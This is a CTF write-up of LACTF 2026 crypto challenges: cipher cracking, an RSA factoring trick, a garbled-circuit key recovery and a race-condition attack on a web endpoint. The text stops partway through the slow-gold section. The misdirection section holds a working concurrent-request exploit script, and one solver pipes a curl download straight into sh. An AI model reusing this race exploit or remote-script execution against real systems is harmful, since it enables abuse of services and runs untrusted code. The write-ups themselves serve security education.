# LACTF 2026

## crypto

### lazy-bigrams

#### Description

We are given `attachments/chall.py` and a ciphertext `attachments/ct.txt`.

`chall.py` does:

1. `pt = phonetic_mapping(phonetic_mapping(flag))`
2. `ct = encryption(pt)`

`phonetic_mapping()` replaces each allowed character with its NATO-style word (plus words for `_{}0-9`), and if the resulting mapped string length is odd it appends a single padding letter `"X"`.

`encryption()` removes non-letters, groups the plaintext into disjoint 2-letter blocks (bigrams), and substitutes each plaintext bigram via a random permutation of all 26^2 possible bigrams. The ciphertext is emitted as 2-letter bigrams.

Flag format is `lactf{...}` and is all lowercase.

#### Solution

Model this as a substitution cipher over the set of ciphertext bigrams that appear.

Let each distinct ciphertext bigram be a “symbol”. Each symbol maps injectively to a plaintext bigram in `AA..ZZ` (0..675). Expanding those plaintext bigrams yields the full plaintext letter stream `s2`.

Key observation: `s2` is (almost always) a pure concatenation of NATO phonetic words for letters `A-Z`, because it is the output of the *second* `phonetic_mapping()` (the only possible exception is a single trailing padding letter `X`, which is appended to make the length even).
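As a minimal sketch (using only an excerpt of the map), a single flag letter already expands through the two mapping rounds into a run of four NATO words:

```python
PHONETIC_MAP = {"L": "LIMA", "I": "INDIA", "M": "MIKE", "A": "ALPHA"}  # excerpt

def nato(s: str) -> str:
    # phonetic_mapping() without the padding step
    return "".join(PHONETIC_MAP[c] for c in s.upper())

assert nato("l") == "LIMA"
assert nato(nato("l")) == "LIMAINDIAMIKEALPHA"  # pure concatenation of NATO words
```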

Constraints used:

1. **Injective mapping**: ciphertext symbol -> plaintext bigram (all-different).
2. **Known prefix crib**: because the flag starts with `lactf{`, the start of `s2 = phonetic_mapping(phonetic_mapping("lactf{"))` is fully known, which fixes many symbol->bigram assignments immediately.
3. **Regular-language constraint**: `s2` must be accepted by a DFA for “concatenation of NATO words” (or that plus a final padding `X`). This is enforced with OR-Tools CP-SAT `AddAutomaton`.

Once `s2` is recovered, decode:

* `s2` -> `s1` by tokenizing NATO words back into letters.
* `s1` -> `flag` by tokenizing the full `PHONETIC_MAP` words back into characters.

All code (solver + decoding) is below:

```python
#!/usr/bin/env python3
import re
from dataclasses import dataclass
from pathlib import Path

from ortools.sat.python import cp_model

HERE = Path(__file__).resolve().parent
CT_PATH = HERE / "attachments" / "ct.txt"

ALPH = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
A2I = {c: i for i, c in enumerate(ALPH)}
I2A = {i: c for i, c in enumerate(ALPH)}

# From attachments/chall.py
PHONETIC_MAP = {
    "A": "ALPHA",
    "B": "BRAVO",
    "C": "CHARLIE",
    "D": "DELTA",
    "E": "ECHO",
    "F": "FOXTROT",
    "G": "GOLF",
    "H": "HOTEL",
    "I": "INDIA",
    "J": "JULIETT",
    "K": "KILO",
    "L": "LIMA",
    "M": "MIKE",
    "N": "NOVEMBER",
    "O": "OSCAR",
    "P": "PAPA",
    "Q": "QUEBEC",
    "R": "ROMEO",
    "S": "SIERRA",
    "T": "TANGO",
    "U": "UNIFORM",
    "V": "VICTOR",
    "W": "WHISKEY",
    "X": "XRAY",
    "Y": "YANKEE",
    "Z": "ZULU",
    "_": "UNDERSCORE",
    "{": "OPENCURLYBRACE",
    "}": "CLOSECURLYBRACE",
    "0": "ZERO",
    "1": "ONE",
    "2": "TWO",
    "3": "THREE",
    "4": "FOUR",
    "5": "FIVE",
    "6": "SIX",
    "7": "SEVEN",
    "8": "EIGHT",
    "9": "NINE",
}

NATO_WORDS = [PHONETIC_MAP[chr(ord("A") + i)] for i in range(26)]


def clean_alpha(s: str) -> str:
    return "".join(ch for ch in s.upper() if ch in ALPH)


def phonetic_mapping_no_pad(ptext: str) -> str:
    """phonetic_mapping() but without appending trailing 'X' padding."""
    cleanptext = re.sub(r"[^a-zA-Z0-9_{}]", "", ptext).upper()
    return "".join(PHONETIC_MAP[c] for c in cleanptext)


def phonetic_mapping_letters_no_pad(ptext: str) -> str:
    """phonetic_mapping() but restricted to A-Z input and without trailing pad."""
    cleanptext = re.sub(r"[^A-Z]", "", ptext.upper())
    return "".join(PHONETIC_MAP[c] for c in cleanptext)


def s2_prefix_for_flag_prefix(flag_prefix: str) -> str:
    """Compute s2 = phonetic_mapping(phonetic_mapping(flag_prefix)) without pad."""
    s1 = phonetic_mapping_no_pad(flag_prefix)
    return phonetic_mapping_letters_no_pad(s1)


def build_constraints_from_prefix(ct_pairs: list[str], flag_prefix: str) -> tuple[dict[str, str], str]:
    s2_pref = clean_alpha(s2_prefix_for_flag_prefix(flag_prefix))
    pref_pairs = [s2_pref[i : i + 2] for i in range(0, (len(s2_pref) // 2) * 2, 2)]
    m: dict[str, str] = {}
    for i, pp in enumerate(pref_pairs):
        cp = ct_pairs[i]
        if cp in m and m[cp] != pp:
            raise RuntimeError(f"prefix constraint conflict at pos={i}: {cp} -> {m[cp]} vs {pp}")
        m[cp] = pp
    return m, s2_pref


class TrieNode:
    __slots__ = ("nxt", "term")

    def __init__(self):
        self.nxt: dict[int, int] = {}
        self.term: bool = False


@dataclass
class Automaton:
    initial_state: int
    final_states: list[int]
    transitions: list[tuple[int, int, int]]


def build_nato_automaton() -> Automaton:
    # Deterministic DFA: trie of words + "restart at root after finishing a word".
    nodes: list[TrieNode] = [TrieNode()]  # root=0
    for w in NATO_WORDS:
        cur = 0
        for ch in w:
            a = A2I[ch]
            nxt = nodes[cur].nxt.get(a)
            if nxt is None:
                nxt = len(nodes)
                nodes[cur].nxt[a] = nxt
                nodes.append(TrieNode())
            cur = nxt
        nodes[cur].term = True

    root = 0
    dead = len(nodes)
    transitions: list[tuple[int, int, int]] = []

    # Dead state loops.
    for a in range(26):
        transitions.append((dead, a, dead))

    # Trie transitions; from terminal states, missing edges behave like root edges.
    for s, node in enumerate(nodes):
        for a in range(26):
            if a in node.nxt:
                transitions.append((s, a, node.nxt[a]))
                continue
            if node.term and (a in nodes[root].nxt):
                transitions.append((s, a, nodes[root].nxt[a]))
            else:
                transitions.append((s, a, dead))

    final_states = [i for i, n in enumerate(nodes) if n.term]
    return Automaton(initial_state=root, final_states=final_states, transitions=transitions)


def decode_by_words(s: str, word_to_val: dict[str, str], *, allow_trailing_x: bool = True) -> str:
    # Greedy longest-match using a trie (word sets are prefix-free here).
    inv_trie: dict[str, dict] = {}
    for w, v in word_to_val.items():
        cur = inv_trie
        for ch in w:
            cur = cur.setdefault(ch, {})
        cur[""] = v  # terminal marker

    i = 0
    out: list[str] = []
    while i < len(s):
        cur = inv_trie
        j = i
        found = None
        found_j = None
        while j < len(s) and s[j] in cur:
            cur = cur[s[j]]
            j += 1
            if "" in cur:
                found = cur[""]
                found_j = j
        if found is None:
            if allow_trailing_x and (i == len(s) - 1) and (s[i] == "X"):
                break
            raise ValueError(f"decode failed at offset {i}: {s[i:i+60]}")
        out.append(found)
        i = found_j
    return "".join(out)


def solve(max_time: float = 180.0, workers: int = 8) -> str:
    ct = clean_alpha(CT_PATH.read_text())
    assert len(ct) % 2 == 0
    ct_pairs = [ct[i : i + 2] for i in range(0, len(ct), 2)]
    n_pairs = len(ct_pairs)

    uniq = sorted(set(ct_pairs))
    sym_id = {bg: i for i, bg in enumerate(uniq)}
    ct_syms = [sym_id[p] for p in ct_pairs]

    crib, s2_pref = build_constraints_from_prefix(ct_pairs, "lactf{")
    fixed: dict[int, int] = {}
    for c_bg, p_bg in crib.items():
        sid = sym_id[c_bg]
        pid = A2I[p_bg[0]] * 26 + A2I[p_bg[1]]
        fixed[sid] = pid

    aut = build_nato_automaton()

    def try_solve(*, pad_x: bool) -> str | None:
        model = cp_model.CpModel()

        # Cipher-symbol -> plaintext bigram id in [0, 675].
        bg = [model.NewIntVar(0, 26 * 26 - 1, f"bg_{s}") for s in range(len(uniq))]
        model.AddAllDifferent(bg)
        for sid, pid in fixed.items():
            model.Add(bg[sid] == pid)

        # Bigram -> letters.
        first_arr = [i // 26 for i in range(26 * 26)]
        second_arr = [i % 26 for i in range(26 * 26)]
        l0 = [model.NewIntVar(0, 25, f"l0_{s}") for s in range(len(uniq))]
        l1 = [model.NewIntVar(0, 25, f"l1_{s}") for s in range(len(uniq))]
        for s in range(len(uniq)):
            model.AddElement(bg[s], first_arr, l0[s])
            model.AddElement(bg[s], second_arr, l1[s])

        # Decrypted s2 letters.
        L = [model.NewIntVar(0, 25, f"L_{i}") for i in range(2 * n_pairs)]
        for k, sid in enumerate(ct_syms):
            model.Add(L[2 * k] == l0[sid])
            model.Add(L[2 * k + 1] == l1[sid])

        # Known s2 prefix from lactf{
        for i, ch in enumerate(s2_pref):
            model.Add(L[i] == A2I[ch])

        # Handle possible final padding 'X' by trying both cases.
        if pad_x:
            model.Add(L[-1] == A2I["X"])
            model.AddAutomaton(L[:-1], aut.initial_state, aut.final_states, aut.transitions)
        else:
            model.AddAutomaton(L, aut.initial_state, aut.final_states, aut.transitions)

        err = model.Validate()
        if err:
            raise RuntimeError(err)

        solver = cp_model.CpSolver()
        solver.parameters.max_time_in_seconds = max_time
        solver.parameters.num_search_workers = workers
        res = solver.Solve(model)
        if res not in (cp_model.OPTIMAL, cp_model.FEASIBLE):
            return None

        return "".join(I2A[int(solver.Value(v))] for v in L)

    s2 = try_solve(pad_x=False) or try_solve(pad_x=True)
    if s2 is None:
        raise RuntimeError("no solution")

    # Decode s2 -> s1 letters (A-Z)
    inv_az = {PHONETIC_MAP[chr(ord("A") + i)]: chr(ord("A") + i) for i in range(26)}
    s1 = decode_by_words(s2, inv_az, allow_trailing_x=True)

    # Decode s1 -> flag characters
    inv_full = {v: k for k, v in PHONETIC_MAP.items()}
    flag = decode_by_words(s1, inv_full, allow_trailing_x=True).lower()
    return flag


if __name__ == "__main__":
    print(solve())
```

Running it prints the flag: `lactf{n0t_r34lly_4_b1gr4m_su8st1tu7ion_bu7_1_w1ll_tak3_1t_f0r_n0w}`

### misdirection

#### Description

A snake game web app backed by NTRUSign cryptographic signatures. The `/grow` endpoint increments a counter if you provide a valid NTRUSign signature for the current count, but limits growth to `current_count < 4`. The `/flag` endpoint requires `current_count >= 14`. The server uses gunicorn with `gthread` (1 worker, 80 threads) and has no locking around the check-and-increment logic.

#### Solution

The "misdirection" is NTRUSign itself — you don't need to break the cryptography. The vulnerability is a **race condition** in the `/grow` endpoint's TOCTOU (time-of-check to time-of-use) pattern:

```python
if current_count < 4 and client_count == current_count:
    # ... verify signature (SLOW for non-cached) ...
    if verif:
        current_count += 1
        ready_status["status"] = False
        # ... sign new count (SLOW) ...
```

Multiple threads can pass the `current_count < 4` check before any thread increments. Once past the check, each thread independently increments the counter regardless of its new value.

**Key trick — cache busting:** The server caches signatures by string. Cached lookups are instant (no race window). To force the slow `NTRU.Verifying()` code path (which takes \~100ms due to O(N^2) polynomial multiplication), we modify each signature string to be unique while parsing identically. Adding leading zeros to the nonce `r` (e.g., `==0` → `==00`, `==000`, etc.) produces different cache keys but `int("00") == int("0") == 0`.
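A minimal sketch of the principle, with a hypothetical nonce value:

```python
# Distinct strings make distinct cache keys, but all parse to the same nonce.
r_value = "31337"                                 # hypothetical nonce digits
variants = ["0" * k + r_value for k in range(4)]  # "31337", "031337", ...

assert len(set(variants)) == 4                    # four different cache keys
assert {int(v) for v in variants} == {31337}      # but one and the same integer
```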

**Simultaneous delivery:** To maximize threads passing the check before any increments, we use Python `multiprocessing` with a `Barrier`: each subprocess pre-establishes its TCP+TLS connection, waits at the barrier until all are connected, then all send their HTTP request simultaneously.

With 80 concurrent requests, enough threads (14+) enter the slow verification path simultaneously and all increment the counter past the limit. Then we call `/flag`.

```python
#!/usr/bin/env python3
import multiprocessing
import socket
import ssl
import requests
import sys
import time
import json
import re
from urllib.parse import urlparse

BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8000"
NUM_REQUESTS = 80

def wait_for_ready():
    while True:
        try:
            r = requests.get(f"{BASE_URL}/status", timeout=10)
            if r.json().get("status"):
                return
        except Exception:
            pass
        time.sleep(2)

def modify_signature(sig, variant):
    """Add leading zeros to nonce r to bust the signature cache."""
    parts = sig.split("\n==")
    header_and_coeffs = parts[0]
    r_and_footer = parts[1]
    r_line_end = r_and_footer.index("\n")
    r_value = r_and_footer[:r_line_end]
    footer = r_and_footer[r_line_end:]
    return header_and_coeffs + "\n==" + "0" * variant + r_value + footer

def blast_with_multiprocess(sigs):
    parsed = urlparse(BASE_URL)
    host = parsed.hostname
    port = parsed.port or (443 if parsed.scheme == 'https' else 80)
    use_ssl = parsed.scheme == 'https'
    barrier = multiprocessing.Barrier(len(sigs), timeout=30)
    results = multiprocessing.Manager().dict()

    def worker(idx, sig, barrier, results):
        body = json.dumps({"count": 0, "sig": sig})
        request = (
            f"POST /grow HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Content-Type: application/json\r\n"
            f"Content-Length: {len(body)}\r\n"
            f"Connection: close\r\n\r\n{body}"
        )
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(120)
        if use_ssl:
            ctx = ssl.create_default_context()
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.connect((host, port))
        try:
            barrier.wait()
        except Exception:
            pass
        sock.sendall(request.encode())
        response = b""
        while True:
            try:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
            except socket.timeout:
                break
        sock.close()
        try:
            body_start = response.find(b"\r\n\r\n") + 4
            resp_body = response[body_start:].decode()
            if b"Transfer-Encoding: chunked" in response:
                decoded, pos = "", 0
                while pos < len(resp_body):
                    nl = resp_body.find("\r\n", pos)
                    if nl == -1: break
                    sz = int(resp_body[pos:nl], 16)
                    if sz == 0: break
                    decoded += resp_body[nl+2:nl+2+sz]
                    pos = nl + 2 + sz + 2
                resp_body = decoded
            results[idx] = json.loads(resp_body)
        except Exception as e:
            results[idx] = {"msg": f"error: {e}"}

    procs = []
    for i, sig in enumerate(sigs):
        p = multiprocessing.Process(target=worker, args=(i, sig, barrier, results))
        procs.append(p)
    for p in procs:
        p.start()
    for p in procs:
        p.join(timeout=300)
    return [results.get(i, {"msg": "timeout"}) for i in range(len(sigs))]

def main():
    for attempt in range(5):
        wait_for_ready()
        count = requests.get(f"{BASE_URL}/current-count").json()["count"]
        if count >= 14:
            result = requests.post(f"{BASE_URL}/flag", json={}).json()
            print(result["msg"])
            return
        if count != 0:
            requests.get(f"{BASE_URL}/regenerate-keys", timeout=300)
            wait_for_ready()
        zero_sig = requests.get(f"{BASE_URL}/zero-signature").json()["signature"]
        sigs = [modify_signature(zero_sig, i) for i in range(1, NUM_REQUESTS + 1)]
        responses = blast_with_multiprocess(sigs)
        grown = sum(1 for d in responses if "grown" in d.get("msg", ""))
        count = requests.get(f"{BASE_URL}/current-count").json()["count"]
        print(f"Attempt {attempt+1}: {grown} grown, count={count}")
        if count >= 14:
            wait_for_ready()
            result = requests.post(f"{BASE_URL}/flag", json={}).json()
            print(result["msg"])
            return
        requests.get(f"{BASE_URL}/regenerate-keys", timeout=300)
        time.sleep(5)

if __name__ == "__main__":
    main()
```

**Flag:** `lactf{d0nt_b3_n0nc00p3r4t1v3_w1th_my_s3rv3r}`

### not-so-lazy-trigrams

#### Description

Finally got the energy to write a trigram substitution cipher. Surely three shuffles are better than one!

Files: `ct.txt`, `chall.py`

#### Solution

**Analysis of the cipher:**

The challenge implements a "trigram substitution cipher" using three independent alphabet shuffles (`shufflei`, `shufflej`, `shufflek`). The key insight is that despite appearing to operate on trigrams (3-letter blocks), the cipher actually decomposes into **three independent monoalphabetic substitution ciphers** based on character position mod 3:

* Position 0, 3, 6, ... → substituted by `shufflei`
* Position 1, 4, 7, ... → substituted by `shufflej`
* Position 2, 5, 8, ... → substituted by `shufflek`

This is because `sub_trigrams[a*676 + b*26 + c] = chr(shufflei[a]) + chr(shufflej[b]) + chr(shufflek[c])`, meaning each character in a trigram is substituted independently.

The `formatter` function removes spaces from the output but preserves all other punctuation from the original plaintext.

**Cracking approach:**

1. The ciphertext ends with a visible flag structure: `zjlel{heqmz_dgk_tevr_tk_vnnds_c_imcqaeyde_ug_byndu_e_jjaogy_rqqnisoqe_cwtnamd}`
2. We know `zjlel` → `lactf`, which gives us initial mappings across all three ciphers.
3. From the flag word length pattern `[5, 3, 4, 2, 5, 1, 9, 2, 5, 1, 6, 9, 7]` and the challenge theme ("not so lazy"), we hypothesize the flag content is: `still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article`
4. Verifying this hypothesis against the ciphertext shows **perfect consistency** across all three cipher mappings — no contradictions.
5. Partial decryption of the main text confirms it's a Wikipedia article about circular polarization, validating the hypothesis.

**Flag:** `lactf{still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article}`

**Solver code:**

```python
import re

ct_raw = open('attachments/ct.txt').read()

# Extract all alpha characters
ct_alpha = re.sub(r'[^a-zA-Z]', '', ct_raw).lower()

# Flag content between { and }
flag_start_raw = ct_raw.find('zjlel{')
flag_content_raw = ct_raw[flag_start_raw+6:ct_raw.find('}')]

# Word lengths: [5, 3, 4, 2, 5, 1, 9, 2, 5, 1, 6, 9, 7]
# Hypothesis based on challenge theme and word pattern
hypothesis = "still_too_lazy_to_write_a_plaintext_so_heres_a_random_wikipedia_article"
hyp_alpha = re.sub(r'[^a-zA-Z]', '', hypothesis).lower()
flag_content_alpha = re.sub(r'[^a-zA-Z]', '', flag_content_raw).lower()

# Determine starting position in alpha stream for flag content
alpha_before = re.sub(r'[^a-zA-Z]', '', ct_raw[:flag_start_raw+6]).lower()
flag_alpha_start = len(alpha_before)

# Build and verify cipher mappings
mappings = [{}, {}, {}]
consistent = True
for i, (ct_c, pt_c) in enumerate(zip(flag_content_alpha, hyp_alpha)):
    cidx = (flag_alpha_start + i) % 3
    if ct_c in mappings[cidx]:
        if mappings[cidx][ct_c] != pt_c:
            print(f"INCONSISTENCY: cipher {cidx}, {ct_c} -> {mappings[cidx][ct_c]} vs {pt_c}")
            consistent = False
    else:
        mappings[cidx][ct_c] = pt_c

# Also add "lactf" -> "zjlel" mappings
lactf_start = len(re.sub(r'[^a-zA-Z]', '', ct_raw[:flag_start_raw]).lower())
for i, (ct_c, pt_c) in enumerate(zip('zjlel', 'lactf')):
    cidx = (lactf_start + i) % 3
    mappings[cidx][ct_c] = pt_c

print(f"All mappings consistent: {consistent}")
print(f"Flag: lactf{{{hypothesis}}}")
```

### sisyphus

#### Description

A challenge implementing Yao's garbled circuits with the free XOR optimization. The circuit computes `AND(0, your_choice)`, which always outputs 0 regardless of input. To get the flag, you must provide the key of the output wire's **one** label — a value that should be unreachable through normal evaluation.

#### Solution

The circuit uses the **half-gates / point-and-permute** technique where one garbled table entry (at pointer position (0,0)) is implicit (derived via `decrypt_zeros`), and the other three entries are stored explicitly.

In the free XOR scheme, every wire has `one.key = zero.key ⊕ Δ` for a global secret `Δ`. Normal evaluation only yields `wc.zero` (since AND(0, x) = 0). To get `wc.one.key = wc.zero.key ⊕ Δ`, we need to recover `Δ`.

**The vulnerability**: For an AND gate, three of the four truth table rows encrypt `wc.zero` and one encrypts `wc.one`. The encrypted key at position (i,j) is `E(la.key) ⊕ E(lb.key) ⊕ lc.key`, where `E(k) = AES_k(iv‖0)`. Due to the algebraic structure of free XOR (where paired labels differ by `Δ` in key-space), XORing all three explicit table entries causes all the AES terms to cancel:

```
ek[0][1] ⊕ ek[1][0] ⊕ ek[1][1] = Δ
```

This holds regardless of the random pointer bit assignment. With `Δ` recovered, we evaluate normally to get `c0 = wc.zero.key`, then compute `c1 = c0 ⊕ Δ`.
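The cancellation can be checked with a toy model, replacing the AES-based `E` by a lazily sampled random function and choosing `c0` so the implicit (0,0) entry is all zeros (matching the `decrypt_zeros` convention):

```python
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

_E = {}
def E(k: bytes) -> bytes:
    # Stand-in for the AES-based hash: a random function of the label.
    if k not in _E:
        _E[k] = os.urandom(16)
    return _E[k]

delta = os.urandom(16)                    # global free-XOR secret
a0, b0 = os.urandom(16), os.urandom(16)   # input-wire zero labels
a1, b1 = xor(a0, delta), xor(b0, delta)   # one labels differ by delta

c0 = xor(E(a0), E(b0))                    # makes the implicit (0,0) entry zero
c1 = xor(c0, delta)                       # output wire's one label

ek01 = xor(xor(E(a0), E(b1)), c0)         # AND(0,1) = 0
ek10 = xor(xor(E(a1), E(b0)), c0)         # AND(1,0) = 0
ek11 = xor(xor(E(a1), E(b1)), c1)         # AND(1,1) = 1

# E(a1) and E(b1) each appear twice and cancel; the survivors are
# E(a0) ^ E(b0) ^ c1 = c0 ^ c1 = delta.
assert xor(xor(ek01, ek10), ek11) == delta
```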

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.strxor import strxor

r = remote('chall.lac.tf', 31182)

r.recvuntil(b'decide your fate: ')
r.sendline(b'0')

# Parse wire labels
line0 = r.recvline().decode().strip()  # wire 0: key_hex ptr
line1 = r.recvline().decode().strip()  # wire 1: key_hex ptr

parts0 = line0.split()
key_a = bytes.fromhex(parts0[2])
ptr_a = int(parts0[3])

parts1 = line1.split()
key_b = bytes.fromhex(parts1[2])
ptr_b = int(parts1[3])

# Parse 3 table entries (positions (0,1), (1,0), (1,1))
table_entries = {}
for i, j in ((0, 1), (1, 0), (1, 1)):
    line = r.recvline().decode().strip()
    parts = line.split()
    ek = bytes.fromhex(parts[0])
    ep = int(parts[1])
    table_entries[(i, j)] = (ek, ep)

# Parse IV
iv_line = r.recvline().decode().strip()
iv = bytes.fromhex(iv_line.split()[-1])

# KEY INSIGHT: delta = XOR of the three encrypted keys
ek01 = table_entries[(0, 1)][0]
ek10 = table_entries[(1, 0)][0]
ek11 = table_entries[(1, 1)][0]
delta = strxor(strxor(ek01, ek10), ek11)

# Evaluate normally to get c0 (wc.zero.key)
BUF_LEN = 16

if ptr_a == 0 and ptr_b == 0:
    aes1 = AES.new(key_a, AES.MODE_CTR, nonce=iv)
    aes2 = AES.new(key_b, AES.MODE_CTR, nonce=iv)
    ks2 = aes2.decrypt(bytes(BUF_LEN))
    c0 = aes1.decrypt(ks2)
else:
    ek, ep = table_entries[(ptr_a, ptr_b)]
    aes1 = AES.new(key_a, AES.MODE_CTR, nonce=iv)
    aes2 = AES.new(key_b, AES.MODE_CTR, nonce=iv)
    dec2 = aes2.decrypt(ek)
    c0 = aes1.decrypt(dec2)

# c1 = c0 XOR delta
c1 = strxor(c0, delta)

r.recvuntil(b'mountain: ')
r.sendline(c1.hex().encode())
print(r.recvall(timeout=5).decode())
```

**Flag**: `lactf{m4yb3_h3_w4s_h4ppy_aft3r_4all}`

### six seven

#### Description

RSA encryption where primes p and q are 256-digit numbers composed only of digits 6 and 7, with the last digit always being 7. We're given `n = p*q` and `c = pow(m, 65537, n)` and need to decrypt the flag.

#### Solution

Since every digit of p and q is either 6 or 7, we can recover p digit-by-digit from the least significant digit (LSB) upward using the constraint that `n = p * q`.

**Key insight:** If we know `p mod 10^k`, we can compute `q mod 10^k = n * p^(-1) mod 10^k` (since p ends in 7, it's always invertible mod powers of 10). We then check whether the k-th digit of q is in {6, 7}. If not, that candidate is pruned.

At each step we try extending p's next digit with both 6 and 7 (2 choices), but only \~2/10 of candidates survive the digit check on q. The branching factor of 2 \* 0.2 = 0.4 means false candidates die off exponentially, leaving only 1-4 candidates throughout the entire search.
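The same pruning loop on a toy modulus (`n = 667 * 677`, both factors built from digits 6/7 and ending in 7) illustrates the search:

```python
# Toy run of the LSB-first digit recovery; the real solve runs the
# identical loop for 256 digits.
n = 667 * 677
candidates = [7]
for k in range(1, 3):                                # recover digits 1 and 2
    mod = 10 ** (k + 1)
    survivors = []
    for p_cand in candidates:
        for d in (6, 7):
            p_new = p_cand + d * 10 ** k
            q_new = (n % mod) * pow(p_new, -1, mod) % mod
            if (q_new // 10 ** k) % 10 in (6, 7):    # prune if q's digit leaves {6,7}
                survivors.append(p_new)
    candidates = survivors

factors = [p_cand for p_cand in candidates if n % p_cand == 0]
assert sorted(factors) == [667, 677]
```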

After recovering all 256 digits of p, we verify `n % p == 0`, compute `phi = (p-1)(q-1)`, find `d = e^(-1) mod phi`, and decrypt `m = c^d mod n`.

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import long_to_bytes
import subprocess, os

POW_BIN = os.path.expanduser("~/.cache/redpwnpow/redpwnpow-v0.1.2-linux-amd64")

r = remote('chall.lac.tf', 31180)

# Handle proof of work
r.recvuntil(b'proof of work:\n')
pow_cmd = r.recvline().decode().strip()
r.recvuntil(b'solution: ')
challenge = pow_cmd.split()[-1]
result = subprocess.run([POW_BIN, challenge], capture_output=True, text=True, timeout=120)
r.sendline(result.stdout.strip().encode())

# Parse n and c
n = int(r.recvline().decode().strip().split('=')[1])
c = int(r.recvline().decode().strip().split('=')[1])
r.close()

# Factor n digit-by-digit from LSB
# Both p and q have digits in {6,7} and end in 7
candidates = [7]

for k in range(1, 256):
    mod = 10 ** (k + 1)
    n_mod = n % mod
    new_candidates = []
    for p_cand in candidates:
        for d in [6, 7]:
            p_new = p_cand + d * (10 ** k)
            q_new = (n_mod * pow(p_new, -1, mod)) % mod
            q_digit = (q_new // (10 ** k)) % 10
            if q_digit in (6, 7):
                new_candidates.append(p_new)
    candidates = new_candidates

for p in candidates:
    if n % p == 0:
        q = n // p
        phi = (p - 1) * (q - 1)
        d = pow(65537, -1, phi)
        m = pow(c, d, n)
        print(long_to_bytes(m).decode())
        break
```

**Flag:** `lactf{wh4t_67s_15_blud_f4ct0r1ng_15_blud_31nst31n}`

### six seven again

#### Description

LA CTF will take place on February 6 and February 7, 2026.

`nc chall.lac.tf 31181`

RSA challenge where one prime `p` is generated with a highly structured form: 67 digits of '6', followed by 67 digits each randomly '6' or '7', followed by 67 digits of '7' (201 decimal digits total). The other prime `q` is a standard 670-bit prime.

#### Solution

The prime `p` has the form:

```
p = base + 10^67 * x
```

where `base = 6 * (10^201 - 10^67)/9 + 7 * (10^67 - 1)/9` is fully known (the contribution from the fixed 6s and 7s, plus the minimum contribution of 6 from each middle digit), and `x = sum(b_i * 10^i for i in 0..66)` with each `b_i ∈ {0,1}` represents the unknown bits (whether each middle digit is 6 or 7).
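A quick sanity check of this decomposition (the digit layout of `base`, and the size bound on `x`):

```python
# base = 67 fixed 6s, plus a minimum 6 in each of the 67 middle digits
# (134 sixes total), followed by 67 fixed 7s.
base = 6 * (10**201 - 10**67) // 9 + 7 * (10**67 - 1) // 9
s = str(base)
assert len(s) == 201
assert s == "6" * 134 + "7" * 67

# The unknown x is at most the 67-digit repunit, i.e. at most 220 bits.
assert ((10**67 - 1) // 9).bit_length() <= 220
```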

The key insight is that `x < (10^67 - 1)/9 ≈ 10^66`, which is roughly 220 bits. Since `p` has 201 digits (≈ 668 bits) and `q` is a 670-bit prime, `N ≈ 1337` bits. Coppersmith's method can find a small root of a degree-1 polynomial modulo an unknown divisor `b ≥ N^β` of `N` when the root is smaller than `N^(β²)`; with `β ≈ 0.5` the bound is `N^0.25 ≈ 2^334`, and our unknown `x ≈ 2^220 < 2^334`, so Coppersmith's method applies directly.

We construct the monic polynomial `f(x) = x + base * (10^67)^{-1} mod N` and use SageMath's `small_roots()` to recover `x`, then factor `N = p * q` and decrypt.

```python
#!/usr/bin/env python3
from pwn import *
from Crypto.Util.number import long_to_bytes
from sage.all import *
import subprocess

io = remote('chall.lac.tf', 31181)

# Handle proof of work
io.recvuntil(b'proof of work:\n')
pow_cmd = io.recvline().decode().strip()
io.recvuntil(b'solution:')
challenge = pow_cmd.split()[-1]
result = subprocess.run(
    ['bash', '-c', f'curl -sSfL https://pwn.red/pow | sh -s {challenge}'],
    capture_output=True, text=True, timeout=120
)
io.sendline(result.stdout.strip().encode())

data = io.recvall(timeout=30).decode().strip()
io.close()

lines = [l.strip() for l in data.split('\n') if '=' in l]
vals = {}
for line in lines:
    key, val = line.split('=', 1)
    vals[key.strip()] = int(val.strip())

n = vals['n']
c = vals['c']

# p = 666...6 (67 digits) || mixed 6/7 (67 digits) || 777...7 (67 digits)
# p = base + 10^67 * x where x has 67 binary digits (each 0 or 1)
base = 6 * (10**201 - 10**67) // 9 + 7 * (10**67 - 1) // 9

# Coppersmith's method - make polynomial monic
P = PolynomialRing(Zmod(n), 'x')
x = P.gen()
inv_coeff = inverse_mod(ZZ(10)**67, n)
f = x + ZZ(base) * ZZ(inv_coeff)

X = (10**67 - 1) // 9 + 1
roots = f.small_roots(X=X, beta=0.49, epsilon=1/32)

x0 = int(roots[0])
p = base + 10**67 * x0
q = n // p
assert p * q == n

phi = (p - 1) * (q - 1)
e = 65537
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Flag: {flag}")
```

**Flag:** `lactf{n_h4s_1337_b1ts_b3c4us3_667+670=1337}`

### slow-gold

#### Description

The server (EMP-ZK arithmetic) commits to two secret length-10 vectors `vec1`, `vec2` over `F_p` where `p = 2^61-1`, and proves in zero-knowledge that one is a permutation of the other by checking `prod_i (vec1[i] + X) == prod_i (vec2[i] + X)` for verifier-chosen `X`.

After the proof, the verifier must submit the 10 elements of `vec1` (order doesn’t matter) to get the flag.

#### Solution

**Bug 1: Broken Batched Multiplication Check Only Checks One Gate**

In `attachments/dist/emp-zk/emp-zk/emp-zk-arith/ostriple.h`, the challenge modified the coefficient generation for the multiplication-gate batch check:

```cpp
uni_hash_coeff_gen(chi, seed, 1);
```

This should have been `task_n`, but with `1` only `chi[0]` is derived from the seed and the rest of the check is effectively not covered.

Worse, the loop bounds are broken:

```cpp
for (uint32_t i = start + task_n - 1, k = 0; i < start + task_n; ++i, ++k)
```

Because `i` is `uint32_t`, starting at `start + task_n - 1` combined with the `< start + task_n` condition makes the loop execute exactly once: it “checks” only the last multiplication gate in that batch.
